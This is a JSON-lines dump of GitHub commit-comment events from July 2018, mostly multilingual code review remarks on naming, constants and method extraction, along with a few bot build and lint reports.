{"id":"7918403916","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595209,"position":19,"line":19,"path":"Assets/Scritpt/UI/NovaPontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:12:35Z","updated_at":"2018-07-04T13:12:35Z","author_association":"NONE","body":"extrair método indicando o que está sendo avaliado"}},"created_at":"2018-07-04T13:12:35Z"}
{"id":"7918404045","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"Microsoft/mesos-jenkins"},"payload":{"comment":{"id":29595210,"position":113,"line":113,"path":"DCOS/Jenkinsfile","commit_id":"c9cbf01cd43fc73734f62a3a06c24c28a467d6eb","created_at":"2018-07-04T13:12:36Z","updated_at":"2018-07-04T13:12:36Z","author_association":"COLLABORATOR","body":"Rename this `E2eTest` to `e2eTesting`. And I don't see it used anywhere."}},"created_at":"2018-07-04T13:12:36Z"}
{"id":"7918404388","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ValiValpas/genode"},"payload":{"comment":{"id":29595212,"position":39,"line":74,"path":"repos/os/src/lib/vfs/rom_file_system.h","commit_id":"c27aa37803ac365343f49ae0f2bf24e8db1c061c","created_at":"2018-07-04T13:12:41Z","updated_at":"2018-07-04T13:12:41Z","author_association":"NONE","body":"If you move this loop into a private method `file_size _init_content_size(binary)`, you can make `_content_size` const by initializing it with the return value of this method."}},"created_at":"2018-07-04T13:12:41Z"}
{"id":"7918406219","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595217,"position":27,"line":27,"path":"Assets/Scritpt/UI/NovaPontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:13:02Z","updated_at":"2018-07-04T13:13:02Z","author_association":"NONE","body":"extrair constante"}},"created_at":"2018-07-04T13:13:02Z"}
{"id":"7918406474","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29595218,"position":5,"line":1162,"path":"tests/1/dir/index.h","commit_id":"40346ab4845f2871eebc9230649d9bd7b5a7f578","created_at":"2018-07-04T13:13:05Z","updated_at":"2018-07-04T13:13:05Z","author_association":"COLLABORATOR","body":"when is Ri TG joining your team?"}},"created_at":"2018-07-04T13:13:05Z"}
{"id":"7918408191","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595223,"position":34,"line":34,"path":"Assets/Scritpt/UI/NovaPontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:13:25Z","updated_at":"2018-07-04T13:13:25Z","author_association":"NONE","body":"da pra extrair em pequenos métodos cada bloco de código"}},"created_at":"2018-07-04T13:13:25Z"}
{"id":"7918409907","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595226,"position":41,"line":41,"path":"Assets/Scritpt/UI/NovaPontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:13:45Z","updated_at":"2018-07-04T13:13:45Z","author_association":"NONE","body":"constante"}},"created_at":"2018-07-04T13:13:45Z"}
{"id":"7918412029","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29595232,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T13:14:10Z","updated_at":"2018-07-04T13:14:10Z","author_association":"NONE","body":"[ubiquity (Ubuntu installer)](https://git.launchpad.net/ubiquity/tree/ubiquity/keyboard_names.py), some of [these files](https://packages.debian.org/sid/all/keyboard-configuration/filelist) may help"}},"created_at":"2018-07-04T13:14:10Z"}
{"id":"7918414827","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595238,"position":9,"line":9,"path":"Assets/Scritpt/UI/PegarUltimoNome.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:14:43Z","updated_at":"2018-07-04T13:14:43Z","author_association":"NONE","body":"Tudo bem por input ser comum, mas daria pra usar em pt-br também, entradaNome"}},"created_at":"2018-07-04T13:14:43Z"}
{"id":"7918415932","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595254,"position":17,"line":17,"path":"Assets/Scritpt/UI/PegarUltimoNome.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:14:56Z","updated_at":"2018-07-04T13:14:56Z","author_association":"NONE","body":"constante\r\n"}},"created_at":"2018-07-04T13:14:56Z"}
{"id":"7918416796","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595271,"position":18,"line":18,"path":"Assets/Scritpt/UI/PegarUltimoNome.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:15:06Z","updated_at":"2018-07-04T13:15:06Z","author_association":"NONE","body":"constante e extração de método"}},"created_at":"2018-07-04T13:15:06Z"}
{"id":"7918417239","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595280,"position":20,"line":20,"path":"Assets/Scritpt/UI/PegarUltimoNome.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:15:12Z","updated_at":"2018-07-04T13:15:12Z","author_association":"NONE","body":"idem constante"}},"created_at":"2018-07-04T13:15:12Z"}
{"id":"7918417886","type":"CommitCommentEvent","actor":{"login":"Doc73"},"repo":{"name":"maieul/ledmac"},"payload":{"comment":{"id":29595283,"position":null,"line":null,"path":null,"commit_id":"4332cad8ceaba1ba440551448226cd6d954472a5","created_at":"2018-07-04T13:15:19Z","updated_at":"2018-07-04T13:15:19Z","author_association":"NONE","body":"I suggest (see issue #722 ): at the end of a document **or of a section**"}},"created_at":"2018-07-04T13:15:19Z"}
{"id":"7918418163","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"Microsoft/mesos-jenkins"},"payload":{"comment":{"id":29595287,"position":122,"line":122,"path":"DCOS/Jenkinsfile","commit_id":"c9cbf01cd43fc73734f62a3a06c24c28a467d6eb","created_at":"2018-07-04T13:15:22Z","updated_at":"2018-07-04T13:15:22Z","author_association":"COLLABORATOR","body":"I would arrange the below like this:\r\n\r\n```\r\n// Pipeline Main scripts\r\nparallel \"Linux init\" :   { checkoutPRcode('dummy-slave') },\r\n         \"Windows init\" : { checkoutPRcode('windows-build-server') }\r\n\r\nparallel \"Diagnostics build\" : { runBuild('jenkins/diagnostics-build', 'windows-build-server', buildDiagnostics) },\r\n         \"Net build\" :         { runBuild('jenkins/net-build',         'windows-build-server', buildNet) },\r\n         \"Mesos build\" :       { runBuild('jenkins/mesos-build',       'windows-build-server', buildMesos) },\r\n         \"Spartan build\" :     { runBuild('jenkins/spartan-build',     'windows-build-server', buildSpartan) }\r\n```\r\n\r\nIt looks more readable."}},"created_at":"2018-07-04T13:15:22Z"}
{"id":"7918421371","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595293,"position":24,"line":24,"path":"Assets/Scritpt/UI/RankingConteiner.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:16:00Z","updated_at":"2018-07-04T13:16:00Z","author_association":"NONE","body":"constante"}},"created_at":"2018-07-04T13:16:00Z"}
{"id":"7918421959","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29595296,"position":null,"line":null,"path":null,"commit_id":"3112ee74ea8dcc5a52a36040f29ff74e36141ee4","created_at":"2018-07-04T13:16:08Z","updated_at":"2018-07-04T13:16:08Z","author_association":"NONE","body":"[tests/testthat/test-graph.R:91:1:](https://github.com/ropensci/drake/blob/3112ee74ea8dcc5a52a36040f29ff74e36141ee4/tests/testthat/test-graph.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​  con <- drake_config(my_plan, targets = c(\"small\", \"large\"), graph = con0$graph)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-04T13:16:08Z"}
{"id":"7918422819","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595300,"position":25,"line":25,"path":"Assets/Scritpt/UI/RankingConteiner.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:16:17Z","updated_at":"2018-07-04T13:16:17Z","author_association":"NONE","body":"extrair cada uma das avaliações em pequenos métodos"}},"created_at":"2018-07-04T13:16:17Z"}
{"id":"7918422870","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29595301,"position":3,"line":3,"path":"examples_tests/28.Benchmark/fs","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-04T13:16:18Z","updated_at":"2018-07-04T13:16:18Z","author_association":"NONE","body":"zero inputs, zero outputs\r\n\r\nNULL/pass-through shader\r\n"}},"created_at":"2018-07-04T13:16:18Z"}
{"id":"7918425050","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595304,"position":30,"line":30,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:16:43Z","updated_at":"2018-07-04T13:16:43Z","author_association":"NONE","body":"На самом деле не очень оптимально хранить копию целого объекта тут. Достаточно было бы хранить индекс как `chosenFriendIndex` и потом получать полного друга через `this.state.friends[this.state.chosenFriendIndex]`."}},"created_at":"2018-07-04T13:16:43Z"}
{"id":"7918425478","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595305,"position":28,"line":28,"path":"Assets/Scritpt/UI/RankingConteiner.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:16:48Z","updated_at":"2018-07-04T13:16:48Z","author_association":"NONE","body":"extrair a formatação de colocação em um método"}},"created_at":"2018-07-04T13:16:48Z"}
{"id":"7918427187","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595306,"position":45,"line":45,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:17:07Z","updated_at":"2018-07-04T13:17:07Z","author_association":"NONE","body":"Какой модал закрывается? Название метода неясное."}},"created_at":"2018-07-04T13:17:07Z"}
{"id":"7918427747","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595310,"position":41,"line":41,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:17:13Z","updated_at":"2018-07-04T13:17:13Z","author_association":"MEMBER","body":"So, AFAIK, the names were changed during the 5.3 development cycle so 5.2 was not affected.\r\n\r\nI didn't want to make it too public that it's the second time we change the names in 5.3, that's why the `Long story short` and why I avoid giving too many details."}},"created_at":"2018-07-04T13:17:13Z"}
{"id":"7918428671","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595316,"position":51,"line":51,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:17:23Z","updated_at":"2018-07-04T13:17:23Z","author_association":"NONE","body":"Должно быть `showAddBillModal`, нет?"}},"created_at":"2018-07-04T13:17:23Z"}
{"id":"7918428717","type":"CommitCommentEvent","actor":{"login":"Hirbod"},"repo":{"name":"FriendsOfREDAXO/undo"},"payload":{"comment":{"id":29595317,"position":28,"line":28,"path":"lib/undo.php","commit_id":"31db007f6a502a66c222ab70c997398071d2fd66","created_at":"2018-07-04T13:17:23Z","updated_at":"2018-07-04T13:17:23Z","author_association":"MEMBER","body":"Ja, einfach nur der Einfachheit halber. Die Table wird eh immer nur für einen Datensatz benötigt und beim nächsten Pagereload gelöscht. Ich habe bewusst nicht TRUNCATE genutzt, da es zu Locks kam bzw das Ladeverhalten dadurch beeinträchtigt wurde. Der SELECT ist nur dafür da, um zu prüfen, ob es einen Datensatz gibt.\r\n\r\nBin offen für Verbesserungsvorschläge"}},"created_at":"2018-07-04T13:17:23Z"}
{"id":"7918429344","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595321,"position":57,"line":57,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:17:31Z","updated_at":"2018-07-04T13:17:31Z","author_association":"NONE","body":"То же, что и выше."}},"created_at":"2018-07-04T13:17:31Z"}
{"id":"7918431067","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595323,"position":23,"line":23,"path":"Assets/Scritpt/UI/TextoDinamico.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:17:50Z","updated_at":"2018-07-04T13:17:50Z","author_association":"NONE","body":"Por que é necessária essa sobrecarga?"}},"created_at":"2018-07-04T13:17:50Z"}
{"id":"7918431718","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595326,"position":72,"line":72,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:17:58Z","updated_at":"2018-07-04T13:17:58Z","author_association":"NONE","body":"Достаточно `[...prevState.friends, newFriend]`."}},"created_at":"2018-07-04T13:17:58Z"}
{"id":"7918432474","type":"CommitCommentEvent","actor":{"login":"palvarezlopez"},"repo":{"name":"eclipse/sumo"},"payload":{"comment":{"id":29595327,"position":null,"line":null,"path":null,"commit_id":"22fed77835b130f2088d6577c900cabd8c872039","created_at":"2018-07-04T13:18:08Z","updated_at":"2018-07-04T13:18:08Z","author_association":"COLLABORATOR","body":"@namdre  I think that we have a function to remove the first part of a Path. For example:\r\n\r\nC:\\project\\additionals.xml -> c:\\project\\\r\n\r\nWhere I can find it?"}},"created_at":"2018-07-04T13:18:08Z"}
{"id":"7918434016","type":"CommitCommentEvent","actor":{"login":"matthiaskoenig"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29595336,"position":null,"line":null,"path":null,"commit_id":"2411bae03b74f522bccedc9332fe818008a6f47f","created_at":"2018-07-04T13:18:25Z","updated_at":"2018-07-04T13:18:25Z","author_association":"COLLABORATOR","body":"Works now.\r\nI registered the jar correctly in the maven respository and also added some documentation on the KISAO terms. Otherwise looks good to me."}},"created_at":"2018-07-04T13:18:25Z"}
{"id":"7918435885","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29595340,"position":null,"line":null,"path":null,"commit_id":"4fc7330e529f0c056ed88e574b4618a4be581ec5","created_at":"2018-07-04T13:18:46Z","updated_at":"2018-07-04T13:18:46Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/61/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/61//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4fc7330e529f0c056ed88e574b4618a4be581ec5/61/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4fc7330e529f0c056ed88e574b4618a4be581ec5/61/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4fc7330e529f0c056ed88e574b4618a4be581ec5/61/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4fc7330e529f0c056ed88e574b4618a4be581ec5/61/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-04T13:18:46Z"}
{"id":"7918435993","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ValiValpas/genode"},"payload":{"comment":{"id":29595341,"position":null,"line":null,"path":null,"commit_id":"c27aa37803ac365343f49ae0f2bf24e8db1c061c","created_at":"2018-07-04T13:18:47Z","updated_at":"2018-07-04T13:18:47Z","author_association":"NONE","body":"For the sake of future safety I would probably add an `enum Rom_type { ROM_TEXT, ROM_BINARY }` and explicitly pass this type to the `Rom_vfs_handle` constructor. This rules out any implicit type conversion that may introduce bugs later when possibly changing the constructor interface. The `binary` member of the label can stay a bool. When passing it to the constructor, I'd do `_label.binary ? ROM_BINARY : ROM_TEXT`."}},"created_at":"2018-07-04T13:18:47Z"}
{"id":"7918437158","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29595345,"position":19,"line":19,"path":"examples_tests/28.Benchmark/vs0","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-04T13:18:59Z","updated_at":"2018-07-04T13:18:59Z","author_association":"NONE","body":"you need to throw in some function of the VertexID so that this doesn't get optimized out by shader compiler"}},"created_at":"2018-07-04T13:18:59Z"}
{"id":"7918439027","type":"CommitCommentEvent","actor":{"login":"crankyoldgit"},"repo":{"name":"markszabo/IRremoteESP8266"},"payload":{"comment":{"id":29595346,"position":null,"line":null,"path":null,"commit_id":"16465302c0a22ce4068c0c87a633c56db22f02da","created_at":"2018-07-04T13:19:21Z","updated_at":"2018-07-04T13:19:21Z","author_association":"COLLABORATOR","body":"XRef #462"}},"created_at":"2018-07-04T13:19:21Z"}
{"id":"7918440254","type":"CommitCommentEvent","actor":{"login":"Nicogene"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29595349,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-04T13:19:35Z","updated_at":"2018-07-04T13:19:35Z","author_association":"CONTRIBUTOR","body":"I suggest to change the return type of functions like this as `bool`."}},"created_at":"2018-07-04T13:19:35Z"}
{"id":"7918440969","type":"CommitCommentEvent","actor":{"login":"matankdr"},"repo":{"name":"nicklester/CM-Well"},"payload":{"comment":{"id":29595351,"position":21,"line":94,"path":"server/cmwell-data-tools/src/main/scala/cmwell/tools/data/downloader/consumer/BufferFillerActor.scala","commit_id":"fc9e0c25ab1c8fef8696921639fb4835e39b43a0","created_at":"2018-07-04T13:19:44Z","updated_at":"2018-07-04T13:19:44Z","author_association":"NONE","body":"minor thing: You can just use a simple if statement, not a pattern matching.\r\nIt would improve readability IMHO :)"}},"created_at":"2018-07-04T13:19:44Z"}
{"id":"7918448851","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595363,"position":106,"line":106,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:21:16Z","updated_at":"2018-07-04T13:21:16Z","author_association":"NONE","body":"Метод называется `handleDoSomething`, но проп должен называться `onDoSomething`. Можешь заметить такое правило, если вчитаешься в официальные документации."}},"created_at":"2018-07-04T13:21:16Z"}
{"id":"7918448995","type":"CommitCommentEvent","actor":{"login":"spl237"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29595364,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T13:21:18Z","updated_at":"2018-07-04T13:21:18Z","author_association":"CONTRIBUTOR","body":"Unfortunately not - I'd already gone through all the keyboard and console setup files. Thanks anyway!"}},"created_at":"2018-07-04T13:21:18Z"}
{"id":"7918451664","type":"CommitCommentEvent","actor":{"login":"Bubba"},"repo":{"name":"haskell/haskell-ide-engine"},"payload":{"comment":{"id":29595371,"position":null,"line":null,"path":null,"commit_id":"a8fe53fde4a3949d61b97c78c79aef5249e063be","created_at":"2018-07-04T13:21:47Z","updated_at":"2018-07-04T13:21:47Z","author_association":"COLLABORATOR","body":"@alanz it never occurred to me that they operate on the same files, will revert now"}},"created_at":"2018-07-04T13:21:47Z"}
{"id":"7918454100","type":"CommitCommentEvent","actor":{"login":"matankdr"},"repo":{"name":"nicklester/CM-Well"},"payload":{"comment":{"id":29595376,"position":65,"line":224,"path":"server/cmwell-data-tools/src/main/scala/cmwell/tools/data/downloader/consumer/BufferFillerActor.scala","commit_id":"fc9e0c25ab1c8fef8696921639fb4835e39b43a0","created_at":"2018-07-04T13:22:15Z","updated_at":"2018-07-04T13:22:15Z","author_association":"NONE","body":"I suggest to write it in 2 separate lines in order to improve readability, something like:\r\n```scala\r\ncase Some(limit) if retryCount < limit\r\n```\r\n```scala\r\ncase Some(limit) if retryCount == limit\r\n```\r\nand use `case _` for unexpected cases\r\n"}},"created_at":"2018-07-04T13:22:15Z"}
{"id":"7918457479","type":"CommitCommentEvent","actor":{"login":"OleksivO"},"repo":{"name":"ScalHive/Interview-Tasks"},"payload":{"comment":{"id":29595385,"position":74,"line":34,"path":"front_end_task_v2/README.md","commit_id":"1e0a7f341cc77600cb422f598924976c5cd82f43","created_at":"2018-07-04T13:22:55Z","updated_at":"2018-07-04T13:22:55Z","author_association":"NONE","body":"... and share it with team@scalhive.com user"}},"created_at":"2018-07-04T13:22:55Z"}
{"id":"7918460840","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595390,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:23:33Z","updated_at":"2018-07-04T13:23:33Z","author_association":"CONTRIBUTOR","body":"Also - are you using the debugger? If you want to check the values in the Map when it's size is over 300 - you can add an \"if (current.size>300) {bla}\" and set a breakpoint there (some IDEs allow for conditional breakpoint, that stop only if [...], not sure if Eclipse [can](https://wiki.eclipse.org/FAQ_How_do_I_set_a_conditional_breakpoint%3F)) "}},"created_at":"2018-07-04T13:23:33Z"}
{"id":"7918486930","type":"CommitCommentEvent","actor":{"login":"oberon-manjaro"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29595450,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-04T13:28:23Z","updated_at":"2018-07-04T13:28:23Z","author_association":"NONE","body":"Thanks a lot for your reply.  I have only tested 6.10.0 release sofar. Will try latest git  snapshot later today... :smile:"}},"created_at":"2018-07-04T13:28:23Z"}
{"id":"7918490233","type":"CommitCommentEvent","actor":{"login":"cosmicdan"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29595458,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T13:29:01Z","updated_at":"2018-07-04T13:29:01Z","author_association":"NONE","body":"> To me, it looks more like a user problem, that an actual bug\r\n> RSRP doesn't make any sense when it comes to actual quality of service (packet loss, bandwidth, latency, ...), while RSSNR does\r\n> So from my point of view, it should just be a user-switchable option\r\n\r\nIdeally we should educate the users that stock ROM is reporting wrong/fake signal, but to make it user-switchable... I suppose that'd be up to custom ROM developers to add a toggle to whatever tweaking app they're using.\r\n\r\nBut if it's a user problem, why did Google decide that the Pixel should also do it?"}},"created_at":"2018-07-04T13:29:01Z"}
{"id":"7918490560","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29595459,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-04T13:29:06Z","updated_at":"2018-07-04T13:29:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T13:29:06Z"}
{"id":"7918493462","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595468,"position":30,"line":30,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:29:39Z","updated_at":"2018-07-04T13:29:39Z","author_association":"NONE","body":"Форматирование слетело. Попробуй использовать prettier с настройкой автоформатирования при сохранении. В Expo Snack тоже есть кнопка форматирования с prettier где-то снизу."}},"created_at":"2018-07-04T13:29:39Z"}
{"id":"7918496420","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595475,"position":51,"line":51,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:30:14Z","updated_at":"2018-07-04T13:30:14Z","author_association":"NONE","body":"`renderFriendInfo` может тогда, чтобы было последовательно с названием компонента?"}},"created_at":"2018-07-04T13:30:14Z"}
{"id":"7918498859","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29595487,"position":7,"line":1162,"path":"tests/1/dir/index.h","commit_id":"e9d1a1a381463e7d8a07a69bb2fd8bc11a81a2f3","created_at":"2018-07-04T13:30:39Z","updated_at":"2018-07-04T13:30:39Z","author_association":"COLLABORATOR","body":"is alex coming?"}},"created_at":"2018-07-04T13:30:39Z"}
{"id":"7918499602","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595490,"position":51,"line":51,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:30:48Z","updated_at":"2018-07-04T13:30:48Z","author_association":"NONE","body":"Или ещё правильнее `renderFriendSelectorItem` и компонент назвать `FriendSelectorItem`, как я сказал ранее."}},"created_at":"2018-07-04T13:30:48Z"}
{"id":"7918499958","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29595491,"position":null,"line":null,"path":null,"commit_id":"b1a8a5af65366b311f61df65426ae992fa3dcab0","created_at":"2018-07-04T13:30:52Z","updated_at":"2018-07-04T13:30:52Z","author_association":"NONE","body":"[tests/testthat/test-graph.R:91:1:](https://github.com/ropensci/drake/blob/b1a8a5af65366b311f61df65426ae992fa3dcab0/tests/testthat/test-graph.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​  con <- drake_config(my_plan, targets = c(\"small\", \"large\"), graph = con0$graph)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-04T13:30:52Z"}
{"id":"7918502124","type":"CommitCommentEvent","actor":{"login":"cty321"},"repo":{"name":"cty321/myfile"},"payload":{"comment":{"id":29595494,"position":null,"line":null,"path":null,"commit_id":"af2f3c070a3a1c90dd17fa6e17e8cb0e38c94960","created_at":"2018-07-04T13:31:16Z","updated_at":"2018-07-04T13:31:16Z","author_association":"OWNER","body":"[nginx优化.txt](https://github.com/cty321/myfile/files/2163347/nginx.txt)\r\n"}},"created_at":"2018-07-04T13:31:16Z"}
